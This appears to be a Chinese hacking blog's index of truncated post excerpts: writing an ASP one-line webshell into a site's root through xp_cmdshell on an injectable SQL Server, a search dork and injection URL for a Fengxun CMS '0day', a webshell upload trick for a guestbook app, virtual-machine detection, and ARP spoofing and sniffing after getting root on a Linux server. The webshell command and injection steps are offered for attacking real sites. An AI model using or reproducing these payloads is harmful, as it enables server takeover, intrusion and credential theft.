-
SA权限ECHO写一句话
注入点是SA权限.xp_cmdshell是存在的.找到网站主目录 dir d:\wwwroot找到站点的目录后.Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\o...
-
风讯CMS 0DAY exploits
关键字: inurl:User/Reg_service.asp风讯的注册页面...漏洞页面:/user/SetNextOptions.asp利用方法:构造注入user/SetNextOptions.asp?sType=1&EquVa...
-
随缘网络留言板v2漏洞
好像有2个版本一个是asp的一个是php的数据库路径 db/sywl.asp漏洞文件 up2.asp 内容太大了...也没什么好解的将以下代码存为 ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话)前面不要加,加...
-
如何判断Linux是否运行在虚拟机上
在有些奸商会把虚拟机当作独立服务器卖,这里简单介绍一下市面上常用虚拟技术(包括容器技术)的判别小技巧。 判断 OpenVZ/Xen PV/UML 判断 OpenVZ/Xen PV/UML 是最容易的,直接检查 /proc 下的相关目录和文件...
-
linux下面玩arp欺骗与嗅探
算是一个记录过程吧,windows下面玩cain久了,发现他占cpu高,关键是没有命令行的。今天也碰到个linux的,直接获得了root密码。上去玩centos的arp欺骗与sniff。(先本地虚拟机里面用federa core 10测试了...
